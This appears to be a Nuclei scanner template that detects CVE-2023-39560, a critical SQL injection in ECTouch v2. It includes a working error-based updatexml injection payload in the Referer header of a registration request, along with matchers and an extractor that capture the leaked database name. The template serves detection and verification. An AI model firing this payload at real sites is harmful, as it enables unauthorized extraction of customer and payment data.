id: CVE-2023-39560

info:
  name: ECTouch v2 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.
  impact: |
    Unauthenticated attackers can exploit SQL injection through the $arr['id'] parameter to extract database contents, potentially stealing customer data, order information, and payment details from the ECTouch e-commerce system.
  remediation: |
    Update ECTouch to a version newer than 2.0 that uses parameterized queries or prepared statements for the id parameter in default/helpers/insert.php.
  reference:
    - https://wiki.bachang.org/doc/2582/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39560
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39560
    cwe-id: CWE-89
    epss-score: 0.04109
    epss-percentile: 0.89479
    cpe: cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ectouch
    product: ectouch
    fofa-query: icon_hash="127711143"
  tags: cve,cve2023,ectouch,sqli,vuln

http:
  - raw:
      - |
        GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
        Host: {{Hostname}}
        Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "XPATH syntax error: '~[^~]+~'<br>"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "XPATH syntax error: '~([a-z0-9]+)~'"
# digest: 4a0a0047304502203e1a471614144acdd7399d5fbf18132ac1664959cc36cf8e21e43402f9cb216b022100eb6688767cb2f72e2820ec4ea16f359a4281e5fccb851938d96e4a4379c942ff:922c64590222798bb761d5b6d8e72950